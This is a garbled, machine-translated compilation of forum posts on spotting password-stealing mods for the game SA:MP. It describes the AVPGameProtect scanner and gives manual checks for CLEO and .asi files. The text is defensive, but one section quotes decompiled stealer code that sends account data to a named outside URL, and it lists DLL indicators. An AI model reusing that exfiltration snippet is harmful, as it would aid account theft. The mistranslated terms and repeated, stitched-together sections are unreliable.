Prvi skener, koji se pojavio još u danima kada je razvijen prvi ASI styler. Već sljedećeg dana nakon pojavljivanja stabilizatora počeo sam razvijati svoj vlastiti anti-čelik.

Skener uključuje sljedeće module:
- YARA signature engine (hvala programskom timu Virustotal za ovako moćan alat),
- script engine od Andreasa Jonsona (AngelScript), brzina, lakoća ugrađivanja i ljepota sličnih skripti u jednom projektu. Zahvaljujući njemu možete brzo i tehnički otvoriti kriptore za CLEO.
- SCM emulator koda, sposoban prilično dobro promovirati CLEO kriptore (od mene)

Karakteristike programa:
- Prilično velika baza podataka kradljivaca, koja raste od otprilike 2014. godine. Prikupili smo dosta zlonamjernih modova sa nekoliko velikih i ne baš velikih stranica.
- Mogućnost skeniranja fascikli i datoteka prevlačenjem u prozor programa.
- Zaključak kratke informacije O malware(tip, nadimak programera i, u starijim verzijama baze podataka, nadimci distributera)
- Skenirajte asi, dll, cleo, sf, cs i druge potencijale opasni fajlovi.
- Otkrivanje zlonamjernog koda u datotekama s promijenjenom ekstenzijom, na primjer, ne tako davno je bilo moderno preimenovati kradljivce u txd datoteke i učitati ih u igru ​​pomoću loadera.
- Raspakivanje šifrovanih CLEO skripti i naknadno skeniranje (treba napomenuti da dešifruje samo poznate kriptore i one na koje smo naišli, ali ovu činjenicu je lako popraviti, samo nam pišite na email i pošaljite fajl). Kada skenirate raspakovanu skriptu, izvor potonje možete pronaći u datoteci temp\decrypt.cs.
- Emulirajte SCM kod u hodu i dešifrirajte skriptu, nakon čega slijedi provjera zlonamjernog koda. (Ako se otkrije zlonamjerni kod, pogledajte dump u temp\decrypt.cs)
- Prijateljski i intuitivan programski interfejs.
- Velika brzina skeniranje prilikom provjere velikog broja datoteka.
- Ugrađeni pregled pronađene datoteke u tekstualnim i heksadecimalnim modovima

Posebno važna tačka! Svako treba da je pročita da ne postavlja glupa pitanja.
Skener je dizajniran samo za provjeru modifikacija igre raspakovane iz arhive, u svakom drugom slučaju je beskorisno!
On takodje NIJE namijenjeno za instalatere i auto-instalere, msi, exe pakete, pif, mmbak, com, scr, vbs, bat, cmd, js i druge potencijalno opasne fajlove koji se ne nalaze u modovima igre, postoje antivirusi za ove fajlove!
Također Ne biste trebali skenirati cijeli sistem, beskorisno je i nema smisla. Ovaj skener je testiran na modifikacije i namijenjen je samo za modifikacije. Možete skenirati folder igre, ali ovdje morate razumjeti da igra ima datoteke koje mogu pristupiti Internetu i biti spremne da se vide u prozoru skenera.

Na to bih vas odmah upozorio ovaj program neće zaštititi vaše račune 100%, kao bilo koji drugi antivirusni program ili skener. Kada na naslovnici napišu antivirusnu 100% zaštitu, za mene je to već signal za uklanjanje antivirusa sa diska. Ali ovaj skener može ubrzati provjeru već poznatih kradljivaca i pomoći vam da izbjegnete nasjedanje na mamac neiskusnih distributera.
Većina najbolji antivirus- Vaša je glava i odluke - preuzeti ili ne preuzeti. Preuzimajte modove samo sa pouzdanih stranica i gdje se prati sigurnost arhive.


Autor programa nije odgovoran za vaše odluke i moguće kradljivce koje skener propusti.

Neki simboli programi:

Pažnja! Otkriven je fajl koji može uspostaviti internet vezu, trebali biste razmisliti o tome prije nego što ga instalirate u igricu. Ali ovo takođe može biti automatsko ažuriranje skripte. Također je moguće imati URL u datoteci. Sve ovisi o vašoj sposobnosti da ručno provjerite datoteke.

CLEO styler je pronađen, fajl je raspakovan i možete pogledati izvor.

Skener je pokušao da raspakira skriptu, ali možda nije uspio ili zlonamjerni kod nije pronađen. Pogledajte izvor u folderu Temp. Provjerite da datoteka nije šifrirana. Ovdje morate ručno provjeriti skriptu.

Pronađen CLEO mirotvorac u otvorenom obliku.

Pronađen je fajl koji preuzima zlonamjerni softver na vaš računar

Pronađen je mirotvorac iz ozloglašenog projekta

Pronađena zaštita, datoteka može predstavljati prijetnju. Ovdje se samo treba osloniti na poštenje i ugled autora. Pitajte autora zašto je datoteka šifrirana (zaštićena), a zatim sami razmislite o adekvatnosti odgovora. Ovaj fajl može biti opasan.

Možda je datoteka blokirana od strane druge aplikacije ili je veličina datoteke nula

Ne preporučujem stavljanje takvih datoteka u igru. Ovdje se svašta može očekivati. Ovo je spajanje nekoliko fajlova u jedan. Među ovim datotekama može biti kradljivac ili drugi zlonamjerni softver. Ne vjerujte ljepilima. Možete se uvjeriti da je lijepljenje bezbedno samo tako što ćete ga sortirati u datoteke i provjeravati svaki fajl posebno.

Molimo Vas da program preuzmete samo sa zvaničnih izvora. Ovo će biti najviše sigurna opcija.
Molimo pišite o greškama putem e-pošte ili u ovoj temi.


Za dinamičku zaštitu naloga preporučujemo korištenje posebnog dodatka iz DarkP1xel.

Ovaj dodatak blokira opasne funkcije u skriptama i drugim modovima.
Ako imate instaliran ovaj dodatak u igri, modovi neće moći slati web zahtjeve serverima trećih strana, što znači da vaša samp lozinka neće pasti u pogrešne ruke, čak i ako ste slučajno instalirali stealer u igra. Dodatak također vodi detaljnu evidenciju svih sumnjivih događaja u igri. Bitan. Dodatak se stalno ažurira, ostanite sa nama.
p.s: ne zaboravite se zahvaliti autoru na dodatku;)

Hvala svima koji su nam pomogli.
Posebno hvala Gedwadionu, DarkP1xel. Ovo su cool momci koji imaju budućnost u IT sigurnosti.

Autori:
smalloff - razvoj, podrška projekta
andre500 - testiranje, podrška projektu
Internet stranice autora (službeni izvori): web stranica, Libertycity.ru
pošta: smalloff@site
Preuzmite program:AVPGameProtect18042019.rar
Počastite programera pivom (hvala unaprijed): Yandex nefiltriran

(Pažnja! Podrška javnom projektu je potpuno ukinuta.)

[Ozbiljan glas Čonišvilija]: Bez mnogo riječi. Zajebi šou. Dok ovo pišem, tvoj bilten i vila na BB-u su već spojeni u državu, a virtuelni su prebačeni na napadača, ah-ha-ha-ha, kašalj kašalj kašalj kašalj *ugušen*

Možete ohladiti svoje prdeće, jer se cleo fajlovi ne postavljaju na stranicu. Ali to ne znači da su zabranjeni na projektu Samp-Rp. Nemojte se zbuniti, prokletstvo!
Svi ljubitelji modifikacija naišli su na koncept pojma “Stiller” (a.k.a Keylogger, ali to je druga priča). Obicno ih stacionari stavljaju u cleo-skripte, o kojima cemo sada govoriti.

Šta je cleo skripta?

Neću objašnjavati šta je cleo skript. opšti koncept, prijeđimo direktno na online igru. Cleo-skripte za SA:MP"a su dizajnirane da poboljšaju udobnost igre. Zahvaljujući njima možete promijeniti sučelje kako vam odgovara. Popravite razne greške, padove itd. Ali postoje i zlonamjerni (ili varljivi) cleo -skripte (cheat - obmana sa engleskog), koje su, inače, strogo zabranjeno na projektu Samp-Rp . Stvoreni su za djecu koja su uvrijeđena životom i koju su tukli u školi. Pa, ne možete a da ne ubacite frazu: “Chits su kao Viagra, za one koji to ne mogu sami.”
Najpoznatiji cleo-script ( .c leo s cript datoteke) - ovo je HP indikator u brojevima, kvadratni radar, skripta koja povećava FPS, razni oblici oklopa i zdravstvenih traka (ponekad to nisu čak ni samo pruge, već vaš omiljeni lik, na primjer A$AP Rocky. Kako se HP smanjuje, fotografija nestaje i ostaje samo silueta).
Mnoge ljude muči pitanje, zasto nema enb serijala na sajtu? Činjenica je da .asi formatu, ovo je također cleo datoteka, samo kompajlirana. Odnosno, u njega možete ušiti i stajler.
Verovatno se pitate zašto pišem temu ako ionako nema Cleo na sajtu. Ali ovo nije na sajtu, ali da biste ga sadržali, potreban vam je barem StreamMemFix1.0 .asi A ovo je samo jedan od brojnih popravki za GTA, kojih je pun svaki ljubitelj napumpavanja svog sana Andreas mods do kapaciteta, i na taj način od njega napraviti slatkiše. A ja vec ćutim o c-hudovima i ostalim modifikacijama.Da li ti je žao naloga?Onda je ova tema za tebe!

Kako provjeriti .cs datoteku za stajler?

Najčešći način je provjera kroz program Wireshark. Sve što trebate:

• 1. Preuzmite sam program (to možete učiniti sa službene web stranice).
• 2. Pogledajte ovaj video, tamo je sve jasno objašnjeno.
  

=====================================================================================================

Drugi način da provjerite Cleo za Stillera. IN najnoviju verziju cleo-biblioteke dolaze dodatni programi, jedan od njih se zove Sunny Builder- šta nam treba.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - stranica na koju se šalju podaci o računu.
@stealer_by_mg 0 1@ je programer samog stealer-a.

=================================================================================================

Takođe, postoji i treći način da proverite da li je fajl ukraden. Postoji skripta "steal_logger" .asi„Upotrebićemo ga da proverimo.
(Da, on sam je cleo format, ali nema razloga za brigu ako vam ne padne na pamet da idete s njim u bazu). Neću vam dati link do njega, potražite ga na internetu.
Ukratko ću objasniti kako ga koristiti.

• 1. Stavite ga u folder igre.
• 2. Idemo na bilo koji SA:MP server, pod bilo koji niko
• 3. Smislimo bilo koju lozinku, ulogujemo se i zatvorimo igru.
• 4. Trebalo bi da se kreira u folderu tekstualnu datoteku (.poruka formatu). Kliknite na njega i u tekstu tražimo red sa IP-om našeg servera i lozinkom za novoregistrovani nalog. Pronađeno - znači da haker već ima ove podatke. Neka bude sretan kad uđe da se igra sa bičem. I u ovom trenutku brišemo zadnji cleo fajl.

[!] Koristi se kao ček samo novokreiranim nalozima, nemojte se prijavljivati ​​na svoje glavne naloge sa ovom skriptom. Nakon provjere, obrišite \ ili napravite zasebnu kopiju GTA za provjeru skripti [!]

Kako provjeriti .asi datoteku za krađu?

Laki dio je gotov. Sada naučimo provjeriti .asi-datoteke, jer styler ne vidi Wireshark u njima. sta da radim? Objaviću nekoliko najpoznatijih metoda.

Većina efikasan metod provjere. Provjera kroz program IEInspector HTTP Analyzer.

===============================================================================================================

Drugi način je da provjerite kod pomoću notepada.

• 1. Otvaranje .asi preko Notepad-a.
• 2. Pogledajmo kod.

Primjer čistog kada (bez mirovanja)

Primjer koda sa mirnije(ne kernel.dll)

Obratimo pažnju na zadnje redove.

Druga opcija za skriveni kradljivac su imena u tekstu "urlmon.dll", "wininet.dl l", "wsock32.dll" u samom kodu. Ili linija " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA ERROR LOADER"

========================================================================================================

"Uprava ne vraća izgubljene račune"- oni su rekli.
"Sigurnost računa je u vašim rukama". Nadam se da su vam nakon čitanja ove teme "ruke gore" ojačale. Vodite računa o svojim računima.

2015-2015 © Prikupljeno sa raznih foruma.

AVPGameProtect je program koji vam pomaže u pretraživanju zlonamjerne datoteke u modifikacijama igre. glavna karakteristika programi ispred ostalih anti-krađa - mogućnost masovnog skeniranja, tj. možete skenirati apsolutno sve datoteke iu bilo kojoj količini, samo prenijeti potrebne datoteke ili fasciklu sa datotekama u prozor programa i sačekajte rezultate skeniranja.

Karakteristike programa:
- Velika baza podataka kradljivaca, koja se održava od 2014.
- Skenirajte asi, dll, cleo, sf, cs i druge potencijalno opasne datoteke.
- Velika brzina pri skeniranju velikog broja datoteka.
- Prikažite informacije o kradljivcu u prozoru programa (tip kradljivaca ili nadimak programera).
- Ugrađeni pregled pronađenih datoteka u tekstualnim i heksadecimalnim modovima.
- Potražite funkcionalnost za interakciju s internetom ili preuzimanje datoteka.
- Provjera CLEO skripti na prisustvo kradljivaca (ne svih, samo onih sa kriptorima poznatim programu). Dešifrovana skripta će se pojaviti u privremenom folderu, u osnovnom folderu programa pod imenom decrypt.cs
- FuncCrypt transkript od SR_Team-a i mnogih drugih.
- Kontinuirana podrška programu.

Skener nije namijenjen za provjeru instalatera i verzija igre, niti za potpuno skeniranje računara. Da biste skenirali, morate izdvojiti mapu ili datoteke iz arhive i prevući ih u program.

Također je vrijedno napomenuti da program ne štiti korisnike 100%. Kao i svaki drugi anti-stealer, namijenjen je samo identificiranju kradljivaca koji su mu poznati, a daljnja odluka o korištenju ovog ili onog moda leži direktno na vama i autor nije odgovoran za VAŠE odluke. Program će se stalno ažurirati.

Neke konvencije programa:
InetLoader- Pažnja! Otkrivena je datoteka koja može uspostaviti internet vezu, razmislite o tome prije preuzimanja. Ali ovo takođe može biti automatsko ažuriranje skripte.
CLEO_Stealer - CLEO styler je pronađen, fajl je raspakovan i možete pogledati izvor.
CLEO_Crypter - Skener je pokušao da raspakira skriptu, možda nije uspio ili zlonamjerni kod nije pronađen. Pogledajte izvor u folderu Temp.
CLEO_Stealer- Pronađen CLEO umirivač u otvorenom obliku.
Downloader_stealer- Pronašli smo datoteku koja preuzima zlonamjerni softver na vaš računar
Stealers_ru- Pronađen je mirer iz poznatog projekta
Danger_VMProtect- Pronađena zaštita, datoteka može predstavljati prijetnju
Skeniranje nije uspjelo - Datoteka je možda blokirana od strane druge aplikacije ili je veličina datoteke nula
JoinFiles- Skener je pronašao nekoliko datoteka koje su spojene u jednu. Među ovim datotekama može biti kradljivac ili drugi zlonamjerni softver.

Kako možete izbjeći nalet na kradljivca?!

Stealer je skripta koja se instalira kopiranjem datoteke sa zlonamjernim kodom u GTA folder. Nakon instalacije, svaki put kada se prijavite na server igre, on će pročitati sve unesene podatke u dijalozima (pin kodovi, lozinka, tajni ključevi, podaci) i poslati ih napadaču. Dakle, jednostavnom instalacijom skripte u GTA folder, ako unesete ispravne podatke u dijalog, možete izgubiti sve svoje račune za igru.

On ovog trenutka Učestali su slučajevi krađe naloga za igre na raznim Samp serverima. Najčešće su to serveri sa Role play modom, jer valuta igre ima svoju vrijednost. Napadači zarađuju na vašoj gluposti. U ovom članku ću vam pokazati metode koje poznajem. Znate, ljudi koji tjeraju te kradljivce žive po principu „Ako ne jedeš, nećeš živjeti“.

Osnovni savjeti:

1. Uvijek koristite sve metode da zaštitite račun koji vam je dala administracija projekta na kojem igrate. (Grafički PIN kod, SMS veza itd. Sve zavisi od funkcionalnosti servera).
2. Koristite lozinku koja je što je moguće duža i koja ima složenu strukturu.
3. Nemojte se prijavljivati ​​na server sa lozinkom koju koristite na drugima.
4. Nemojte dijeliti podatke o svom računu sa osobom u koju niste 100% sigurni.
5. Ne savjetujem vam da koristite razne prilagođene modifikacije u igri. Mogu sadržavati šifrirani virus (Stiller). Stiller (od engleskog to krasti, krasti) je određena klasa trojanaca (zlonamjerni softver, virusi - šta god želite), čija se funkcionalnost u potpunosti sastoji od krađe lozinki pohranjenih u sistemu i slanja ih "autoru"
Nakon što ste instalirali Stealer mod, prilikom ulaska u igru ​​unesite svoju lozinku i ona će uspješno preći u ruke lopova. Najčešće se ugrađuje u modove kao što su (Hood, grafička podešavanja i Asi dodatak).
6. Koristite antivirus! Ne dozvoljava vam da pošaljete svoju sačuvanu poštu ili nalog na zaražene sajtove (zaštita od pljačkaša i kradljivaca (exe)).
7. Administracija SA:MP servera ne vraća hakovane naloge i ne vraća izgubljeni novac i nikada neće tražiti lozinke vašeg naloga.

Prvi način.

I tako je prva metoda 100% efikasna!!!
Ako ne preuzimate razne modove, cleo skripte, varalice, onda nećete imati NIKAKVIH problema i NEĆETE kradljivaca!

Provjerite putem web stranice:

Prva metoda će zaštititi od svih hakova, ali ovo nije pogodno za sve.
I tako je druga metoda pogodna za one koji preuzimaju skripte, razne modove, haube, varalice i tako dalje. Stoga, imam izlaz za vas, ali vas neće zaštititi 100%! Stranica koja provjerava datoteke razne skripte, upravo ovdje . Posjetom stranice možete pročitati "

Najnovije verzije stealera mogu imati .txd .dff .png .dat formate. Ali oni su povezani u .asi .cs .sf dodacima i neće raditi bez veze. Stoga provjerite sve dodatke i skripte pomoću našeg kontrolora. Ako imate skrivene datoteke u GTA-u, izbrišite ih.

Iz ovoga zaključujemo da sada mirotvorci mogu ugraditi obične fotografije u modove, čak iu .png fajl. Mnogi ljudi kažu

"Jesi li ti ovca ili nešto? Gubi se odavde! Igram SA:MP već 5 godina i znam da kradljivci dolaze samo u modovima ili cleo formatima!"

Nema momaka, kao što vidimo čak i na jednostavnoj slici, weapon.png recimo znam, možda kradljivac! Uvijek provjeravamo svaki mod, kako biste uopće vjerovali nekome. I tako, kada provjerimo datoteku za mirovanje, ako se pojavi

Informacije o rezultatima pretrage:

Stealer nije pronađen:

Tokom skeniranja datoteke nije pronađen zlonamjerni kod ili bilo šta sumnjivo. To znači da ne morate brinuti o svom računu, naš checker koristi sve moguće metode otkrivanje zlonamjernog koda u skriptama.

Karakteristike programa:
- Prilično velika baza kradljivaca, koja raste od otprilike 2014. godine. Prikupili smo dosta zlonamjernih modova sa nekoliko velikih i ne baš velikih stranica. Posebno hvala sajtu Gtavicecity.ru na pruženim uzorcima.
- Mogućnost skeniranja fascikli i datoteka prevlačenjem u prozor programa.
- Prikazuje kratke informacije o zlonamjernom programu (tip, nadimak programera i u starijim verzijama baze podataka distributera)
- Skenirajte asi, dll, cleo, sf, cs i druge potencijalno opasne datoteke.
- Otkrivanje zlonamjernog koda u datotekama s promijenjenom ekstenzijom, na primjer, ne tako davno je bilo moderno preimenovati kradljivce u txd datoteke i učitati ih u igru ​​pomoću loadera.
- Raspakivanje šifrovanih CLEO skripti i naknadno skeniranje (treba napomenuti da dešifruje samo poznate kriptore i one na koje smo naišli, ali ovu činjenicu je lako popraviti, samo nam pišite na email i pošaljite fajl). Kada skenirate raspakovanu skriptu, izvor potonje možete pronaći u datoteci temp\decrypt.cs.
- Emulirajte SCM kod u hodu i dešifrirajte skriptu, nakon čega slijedi provjera zlonamjernog koda. (Ako se otkrije zlonamjerni kod, pogledajte dump u temp\decrypt.cs)
- Prijateljski i intuitivan programski interfejs.
- Prilično jednostavan koncept programa, što znači da se može lako i često ažurirati.
- Velika brzina skeniranja pri skeniranju velikog broja datoteka.
- Ugrađeni pregled pronađene datoteke u tekstualnim i heksadecimalnim modovima

Skener je namijenjen samo za provjeru modifikacija igrica raspakovanih iz arhive, u svakom drugom slučaju je beskoristan.
Također NIJE namijenjen instalaterima i auto-instalaterima.

PAŽNJA!!!
Odmah vas upozoravam da ovaj program neće zaštititi vaše račune 100%, kao bilo koji drugi antivirus ili skener. Kada na naslovnici napišu antivirusnu 100% zaštitu, za mene je to već signal za uklanjanje antivirusa sa diska. Ali ovaj skener može ubrzati provjeru već poznatih kradljivaca i pomoći vam da izbjegnete nasjedanje na mamac neiskusnih distributera.
Najbolji antivirus je vaša glava i odluke - preuzeti ili ne preuzeti. Preuzimajte modove samo sa pouzdanih stranica i gdje se prati sigurnost arhive.

Neke konvencije programa:

U RAZVOJU

HttpAnalyzer je analizator mrežnog saobraćaja. Ako ste tražili funkcionalni alat čija je svrha praćenje HTTP i HTTPS prometa u realnom vremenu, onda mislim da bi vam se trebao svidjeti ovaj program, to je neka vrsta njuškala koji može jasno prikazati sve potrebne informacije o konekcijama!

Općenito, HTTP Analyzer može puno stvari, mislim da možete detaljnije pročitati na službenoj web stranici, napisao sam glavnu ideju.